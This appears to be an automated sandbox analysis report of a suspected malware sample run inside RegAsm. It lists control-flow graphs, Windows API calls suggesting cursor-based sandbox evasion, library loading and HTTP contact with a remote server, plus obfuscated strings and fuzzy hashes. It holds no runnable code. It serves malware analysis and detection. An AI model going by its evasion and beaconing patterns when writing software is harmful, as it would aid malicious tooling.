                                                                                                                                                                                                                                          control_flow_graph 6189 440f20-440f40 6190 440f42-440f56 call 53f1aa 6189->6190 6191 440f7c-440f94 6189->6191 6190->6191 6200 440f58-440f79 call 41f450 call 53f0da call 53f159 6190->6200 6192 440f96-440fde call 4fb3b0 call 4f57c0 6191->6192 6193 440fe0-440fe5 call 4ee6c0 6191->6193 6199 440fea-441005 call 41b910 6192->6199 6193->6199 6207 441008-441018 6199->6207 6200->6191 6207->6207 6209 44101a-441059 call 41a1e0 6207->6209 6215 441064-441068 6209->6215 6216 441095-4410d2 call 414d00 call 54f78c 6215->6216 6217 44106a-441093 6215->6217 6223 441463-441474 call 417140 6216->6223 6224 4410d8-441307 call 5672b0 * 2 call 41fb00 call 54fc1b call 54f66e call 5672b0 call 567190 call 5672b0 * 3 call 567190 call 41fbd0 call 54fc1b call 41b910 6216->6224 6217->6215 6255 44130a-44131a 6224->6255 6255->6255 6256 44131c-441346 call 41a1e0 6255->6256 6259 44137d-441385 call 41bb40 6256->6259 6260 441348-44134f 6256->6260 6264 44138a-441391 6259->6264 6262 441351-441358 6260->6262 6263 44135a 6260->6263 6265 441361-441367 6262->6265 6263->6265 6266 441393-44139a 6264->6266 6267 44139c 6264->6267 6265->6259 6268 441369-44137b call 414e70 6265->6268 6269 4413a3-4413a9 6266->6269 6267->6269 6268->6264 6271 4413f7-441411 call 417140 6269->6271 6272 4413ab-4413c5 call 4ef210 6269->6272 6279 441421-44142d call 41bba0 6271->6279 6280 441413-44141f call 41bb40 6271->6280 6278 4413c8-4413d8 6272->6278 6278->6278 6282 4413da-4413f2 call 4172e0 6278->6282 6285 441432-44145b call 414d00 call 55012d call 54f8c8 6279->6285 6280->6285 6282->6271 6292 441460 6285->6292 6292->6223
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00441245
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004412B9
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                          • __fread_nolock.LIBCMT ref: 0044144F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExclusiveLock__aulldiv$AcquireRelease$ConditionVariableWake__fread_nolock
                                                                                                                                                                                                                                          • String ID: "P@$eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 577242060-2889650871
                                                                                                                                                                                                                                          • Opcode ID: 6ed594085becb53306a4dad177f5e80e509bf602daaba27cc0f6a25ef9ab9fd4
                                                                                                                                                                                                                                          • Instruction ID: 8ab3c6f68b34b0ba270dd6dfddb089e98b0f822792d892a9adaacf0b1e0c687c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed594085becb53306a4dad177f5e80e509bf602daaba27cc0f6a25ef9ab9fd4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF16C71E002189FEB14DFA4DC51BEEBBB1BF88304F14819AE509A7351D7346A85CF65

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 6293 433130-433143 GetCursorPos 6294 433149-433150 6293->6294 6295 433156-433169 GetCursorPos 6294->6295 6296 4335ed 6294->6296 6297 43342f-433460 GetPEB 6295->6297 6298 43316f-433178 6295->6298 6299 4335ef-4335f5 6296->6299 6301 433463-4334b2 6297->6301 6298->6297 6300 43317e-4331a6 GetPEB 6298->6300 6302 4331a9-4331f8 6300->6302 6303 4334b4-4334bb 6301->6303 6304 4334bd 6301->6304 6305 433203 6302->6305 6306 4331fa-433201 6302->6306 6307 4334c4-4334ca 6303->6307 6304->6307 6308 43320a-433210 6305->6308 6306->6308 6309 4334d0-4334d6 6307->6309 6310 4335aa-4335c5 6307->6310 6312 433216-43321c 6308->6312 6313 4332e4-4332f9 6308->6313 6314 4334d9-4334f2 6309->6314 6310->6301 6311 4335cb 6310->6311 6316 4335d2-4335e8 Sleep 6311->6316 6317 43321f-433232 6312->6317 6313->6302 6315 4332ff 6313->6315 6314->6310 6318 4334f8-433519 6314->6318 6319 433306-433329 Sleep GetCursorPos 6315->6319 6316->6294 6317->6313 6320 433238-433253 6317->6320 6321 433520-43353d 6318->6321 6319->6297 6324 43332f-433338 6319->6324 6325 43325a-433277 6320->6325 6322 43354a-43355b 6321->6322 6323 43353f-433567 6321->6323 6322->6321 6330 4335a5 6323->6330 6331 433569-4335a3 6323->6331 6324->6297 6327 43333e-43342a call 5672b0 * 2 call 41fb00 call 5672b0 * 3 call 567190 call 41fbd0 6324->6327 6328 433284-433295 6325->6328 6329 433279-4332a1 6325->6329 6327->6299 6328->6325 6334 4332a3-4332dd 6329->6334 6335 4332df 6329->6335 6330->6314 6331->6316 6334->6319 6335->6317
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor$Sleep$__aulldiv
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1481957275-0
                                                                                                                                                                                                                                          • Opcode ID: 4366ffaee9367ffea03055b95ab056999a8278ba8b74c1802e438da7f2f8d238
                                                                                                                                                                                                                                          • Instruction ID: 670f10937d811d812307df241510028ea0fda929e8b4377b911cd561125e0c45
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4366ffaee9367ffea03055b95ab056999a8278ba8b74c1802e438da7f2f8d238
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9F1C574E042189FDB14CF98D890BAEBBB2FF89304F14819AE819A7345D734AA85CF55

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 6459 50cce0-50cd26 call 50c690 call 50c650 6464 50cd32-50cd56 call 41b910 6459->6464 6465 50cd28-50cd2d 6459->6465 6469 50cd59-50cd69 6464->6469 6466 50ce97-50ce9a 6465->6466 6469->6469 6470 50cd6b-50cd92 call 41a1e0 6469->6470 6473 50cdc0-50cdc5 call 41bb40 6470->6473 6474 50cd94-50cd98 6470->6474 6479 50cdca-50cdce 6473->6479 6475 50cda3 6474->6475 6476 50cd9a-50cda1 6474->6476 6478 50cdaa-50cdb0 6475->6478 6476->6478 6478->6473 6480 50cdb2-50cdbe call 414e70 6478->6480 6481 50cdd0-50cdd7 6479->6481 6482 50cdd9 6479->6482 6480->6479 6484 50cde0-50cde6 6481->6484 6482->6484 6486 50cde8-50cdff call 4ef210 6484->6486 6487 50ce2e-50ce3a call 417140 6484->6487 6492 50ce02-50ce12 6486->6492 6493 50ce3c-50ce4c lstrlenA 6487->6493 6494 50ce4e-50ce57 6487->6494 6492->6492 6495 50ce14-50ce29 call 4172e0 6492->6495 6496 50ce5a-50ce95 GetProcessHeap HeapAlloc lstrcpynA 6493->6496 6494->6496 6495->6487 6496->6466
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,aaj38,?), ref: 0050CE40
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000001,00000000,aaj38,?), ref: 0050CE63
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0050CE6A
                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0050CE7F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$AllocProcesslstrcpynlstrlen
                                                                                                                                                                                                                                          • String ID: 38a49$aaj38
                                                                                                                                                                                                                                          • API String ID: 2211197272-4103302207
                                                                                                                                                                                                                                          • Opcode ID: f068882d9c4cd9a66d94bf4e1dc83c556ab565109339378980c366f5b14dcdf4
                                                                                                                                                                                                                                          • Instruction ID: 08bbaa513fa62d9cccc12bc81a3fcce503bc0ea032a3d737ebf7e79e91738d23
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f068882d9c4cd9a66d94bf4e1dc83c556ab565109339378980c366f5b14dcdf4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 435103B1D04248AFCF04DFE4D898BEEBFB1BF49304F108169E506AB281C7755A85CB94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 6540 42c670-42c680 6541 42c682-42c68e 6540->6541 6542 42c6ae-42c6b0 6540->6542 6543 42c691-42c6a1 6541->6543 6544 42c999-42c99f 6542->6544 6543->6543 6545 42c6a3-42c6ac 6543->6545 6545->6542 6546 42c6b5-42c6cc GetFileAttributesA 6545->6546 6547 42c6d2-42c768 GetLastError call 5672b0 * 3 call 567190 call 41fbd0 6546->6547 6548 42c997 6546->6548 6559 42c776-42c837 call 5672b0 call 567190 6547->6559 6560 42c76a-42c770 6547->6560 6548->6544 6566 42c845-42c8cd call 5672b0 * 2 call 41fb00 6559->6566 6567 42c839-42c83f 6559->6567 6560->6559 6561 42c98d-42c98f 6560->6561 6561->6544 6574 42c8de-42c97d call 5672b0 * 3 call 567190 call 41fbd0 6566->6574 6575 42c8cf-42c8d8 6566->6575 6567->6561 6567->6566 6586 42c993-42c995 6574->6586 6587 42c97f-42c98b 6574->6587 6575->6561 6575->6574 6586->6544 6587->6561 6587->6586
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$AttributesErrorFileLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3597693367-0
                                                                                                                                                                                                                                          • Opcode ID: 1083ba72d6f9da74ff1a1281b331befb0be83b02e0f84e54cb495f8206f5af21
                                                                                                                                                                                                                                          • Instruction ID: 45c6bf80a9a4236fa5f333371ff9548f82703451e4799d120c0b858235f38910
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1083ba72d6f9da74ff1a1281b331befb0be83b02e0f84e54cb495f8206f5af21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6A16FB1E04218AFEB24CFA4DC81B9EBBB5BB88714F118169E908B7384D7386D41CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00424730: __aulldiv.LIBCMT ref: 00424AC6
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042902A
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004291CF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$__aulldiv
                                                                                                                                                                                                                                          • String ID: Ju||i
                                                                                                                                                                                                                                          • API String ID: 898380398-1653578089
                                                                                                                                                                                                                                          • Opcode ID: 8745cb1ceed82f05b992489eba330a7df14f11b7e072391ca8ee3f29851edf64
                                                                                                                                                                                                                                          • Instruction ID: 01edd34a2ff59f6ba276b9c765401dc00774b313d148437bcfa790f6f3787f76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8745cb1ceed82f05b992489eba330a7df14f11b7e072391ca8ee3f29851edf64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A232870E052688FDB25CF68DC90BEEBBB1BF4A308F1481DAD449AB342D6355A85CF54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0050C6E0: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050C734
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0050CCA7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$CloseHandleOpen
                                                                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                                                                          • API String ID: 435140893-366298937
                                                                                                                                                                                                                                          • Opcode ID: 72c89d0deed0a441a999497de95daab5c3724120d9b3ae71b9a47c57a93df974
                                                                                                                                                                                                                                          • Instruction ID: 4ce0df4eb4c6b84b648c5da0d1d41232108de021786f986a04df3d20874892ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72c89d0deed0a441a999497de95daab5c3724120d9b3ae71b9a47c57a93df974
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8A1E1B0D00209DFDB04CFA8C895BEEBFB5BF49304F248659E515AB281D774AA45CFA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          • API String ID: 3732870572-2811858139
                                                                                                                                                                                                                                          • Opcode ID: 256c77af9c7c86e9d179dca9057c864878d4d8de57262045694d68615f2e01f0
                                                                                                                                                                                                                                          • Instruction ID: 9ac544591481852ff1f24b66d42fc835acbe24e5fb17347bccd30f052ea243d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 256c77af9c7c86e9d179dca9057c864878d4d8de57262045694d68615f2e01f0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF613AB1E00208ABDB14DFA9DC55BEEBBB5FF88304F108129E509BB380DB346945CB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0051CC5E
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0051CC9F
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,00000001,00000028,?,00000000,00000001,00000008), ref: 0051CD44
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1090667551-0
                                                                                                                                                                                                                                          • Opcode ID: bb15006e30f6fc4ad114c43c02281f78c9b151033810da23866ffd457616cdb5
                                                                                                                                                                                                                                          • Instruction ID: 97641b7349625e1fc39116a3fc008556c34bd63661c16a7afda32eddf8c500ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb15006e30f6fc4ad114c43c02281f78c9b151033810da23866ffd457616cdb5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5451FFB5E08288AFDF04DBF99C45AEEBFF56F49200F0484AEF555E7282E53846048B61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(000005B6), ref: 0051CF1F
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0051CFFE
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                            • Part of subcall function 0051CBD0: GetModuleHandleA.KERNEL32(00000000), ref: 0051CC5E
                                                                                                                                                                                                                                            • Part of subcall function 0051CBD0: GetLastError.KERNEL32 ref: 0051CC9F
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireErrorHandleLastModuleRelease$ConditionVariableWake
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1192564941-0
                                                                                                                                                                                                                                          • Opcode ID: 4abedb88b9e4a2fe9e1f76f01a90f6b1b3ac3e37f4d0424bec38ce64c612ceba
                                                                                                                                                                                                                                          • Instruction ID: da503e9b5a87a20e2105babc717d57e8608aa471fe1d2307e044f11a65867f3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4abedb88b9e4a2fe9e1f76f01a90f6b1b3ac3e37f4d0424bec38ce64c612ceba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA51D1B5D04259AFDB04EBF8D845AEFBFB5BB58300F04416AF456A3282EA345A04CB71
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0053F4A9
                                                                                                                                                                                                                                            • Part of subcall function 005419D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,0053F492,?,?,?,?,0053F492,?,00589EB8), ref: 00541A31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFeaturePresentProcessorRaise
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1477838251-0
                                                                                                                                                                                                                                          • Opcode ID: e1731ebaf9c9286b43d05d9ca5bf63736d23aafcd07e72bce60f484c2a9b04f9
                                                                                                                                                                                                                                          • Instruction ID: b756088b79cdc6fcb9611e60ec5426cb90f3622610dc80278f53a7cb6555a18f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1731ebaf9c9286b43d05d9ca5bf63736d23aafcd07e72bce60f484c2a9b04f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C616E71D01709DBEB14CFA8E8867AABBF8FB58310F24853AD815E72A1D3749948DB50

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 5479 50c6e0-50c73e InternetOpenA 5480 50c740-50c745 5479->5480 5481 50c74a-50c792 InternetConnectA 5479->5481 5482 50c9ed-50c9f3 5480->5482 5484 50c794-50c7b4 5481->5484 5485 50c7b7-50c7e9 5481->5485 5484->5485 5486 50c7f4-50c7f8 5485->5486 5487 50c825-50c878 HttpOpenRequestA HttpSendRequestA 5486->5487 5488 50c7fa-50c823 5486->5488 5490 50c978-50c9a0 5487->5490 5491 50c87e-50c91b GetLastError call 5672b0 * 3 call 567190 call 50c580 5487->5491 5488->5486 5496 50c9a2 5490->5496 5497 50c9a9-50c9ad 5490->5497 5491->5490 5511 50c91d-50c923 5491->5511 5496->5497 5498 50c9bf-50c9c3 5497->5498 5499 50c9af-50c9bc InternetCloseHandle 5497->5499 5502 50c9d5-50c9d9 5498->5502 5503 50c9c5-50c9d1 5498->5503 5499->5498 5505 50c9ea 5502->5505 5506 50c9db-50c9e6 5502->5506 5503->5502 5505->5482 5506->5505 5511->5490 5512 50c925-50c92b 5511->5512 5512->5490 5513 50c92d-50c974 5512->5513 5513->5490
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050C734
                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,0000EFD2,00000050,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0050C77F
                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0050C858
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InternetOpen$ConnectHttpRequest
                                                                                                                                                                                                                                          • String ID: 6~swr
                                                                                                                                                                                                                                          • API String ID: 3864186401-3949020348
                                                                                                                                                                                                                                          • Opcode ID: a88b0c43ac1a490c4bf373b180905e63d4eef659a6c38b8be00db8ed448ef9b6
                                                                                                                                                                                                                                          • Instruction ID: 70100715baefbb30c352a620779e01e1d808f730c1b61b37c7f171706527f41a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a88b0c43ac1a490c4bf373b180905e63d4eef659a6c38b8be00db8ed448ef9b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB1F6B4E00208EFEB14CFA4C895BEEBBB5FB49304F108559E505AB281D779AA05CF94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 6351 5584d2-5584e2 6352 5584e4-5584f7 call 54ef5e call 54ef71 6351->6352 6353 5584fc-5584fe 6351->6353 6370 558856 6352->6370 6355 558504-55850a 6353->6355 6356 55883e-55884b call 54ef5e call 54ef71 6353->6356 6355->6356 6359 558510-558539 6355->6359 6375 558851 call 553e8c 6356->6375 6359->6356 6362 55853f-558548 6359->6362 6365 558562-558564 6362->6365 6366 55854a-55855d call 54ef5e call 54ef71 6362->6366 6368 55883a-55883c 6365->6368 6369 55856a-55856e 6365->6369 6366->6375 6372 558859-55885c 6368->6372 6369->6368 6374 558574-558578 6369->6374 6370->6372 6374->6366 6377 55857a-558591 6374->6377 6375->6370 6380 5585c6-5585cc 6377->6380 6381 558593-558596 6377->6381 6382 5585a0-5585b7 call 54ef5e call 54ef71 call 553e8c 6380->6382 6383 5585ce-5585d5 6380->6383 6384 5585bc-5585c4 6381->6384 6385 558598-55859e 6381->6385 6414 558771 6382->6414 6387 5585d7 6383->6387 6388 5585d9-5585f7 call 55b45b call 55b421 * 2 6383->6388 6386 558639-558658 6384->6386 6385->6382 6385->6384 6390 558714-55871d call 562150 6386->6390 6391 55865e-55866a 6386->6391 6387->6388 6424 558614-558637 call 54bd99 6388->6424 6425 5585f9-55860f call 54ef71 call 54ef5e 6388->6425 6402 55871f-558731 6390->6402 6403 55878e 6390->6403 6391->6390 6394 558670-558672 6391->6394 6394->6390 6399 558678-558699 6394->6399 6399->6390 6404 55869b-5586b1 6399->6404 6402->6403 6408 558733-558742 GetConsoleMode 6402->6408 6411 558792-5587a8 ReadFile 6403->6411 6404->6390 6409 5586b3-5586b5 6404->6409 6408->6403 6415 558744-558748 6408->6415 6409->6390 6416 5586b7-5586da 6409->6416 6412 558806-558811 GetLastError 6411->6412 6413 5587aa-5587b0 6411->6413 6418 558813-558825 call 54ef71 call 54ef5e 6412->6418 6419 55882a-55882d 6412->6419 6413->6412 6420 5587b2 6413->6420 6422 558774-55877e call 55b421 6414->6422 6415->6411 6421 55874a-558762 ReadConsoleW 6415->6421 6416->6390 6423 5586dc-5586f2 6416->6423 6418->6414 6431 558833-558835 6419->6431 6432 55876a-558770 call 54ef17 6419->6432 6427 5587b5-5587c7 6420->6427 6429 558764 GetLastError 6421->6429 6430 558783-55878c 6421->6430 6422->6372 6423->6390 6434 5586f4-5586f6 6423->6434 6424->6386 6425->6414 6427->6422 6437 5587c9-5587cd 6427->6437 6429->6432 6430->6427 6431->6422 6432->6414 6434->6390 6441 5586f8-55870f 6434->6441 6444 5587e6-5587f3 6437->6444 6445 5587cf-5587df call 5581e4 6437->6445 6441->6390 6451 5587f5 call 55833b 6444->6451 6452 5587ff-558804 call 55802a 6444->6452 6456 5587e2-5587e4 6445->6456 6457 5587fa-5587fd 6451->6457 6452->6457 6456->6422 6457->6456
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5e435fbe6e5c3a679a91dfe9a823a3dad20eb66d7fc31304da5faf88fc3d29ed
                                                                                                                                                                                                                                          • Instruction ID: 262db4f49929ea17d8601a280de0a5c79875f4d3884bb4c56c2f73198716848e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e435fbe6e5c3a679a91dfe9a823a3dad20eb66d7fc31304da5faf88fc3d29ed
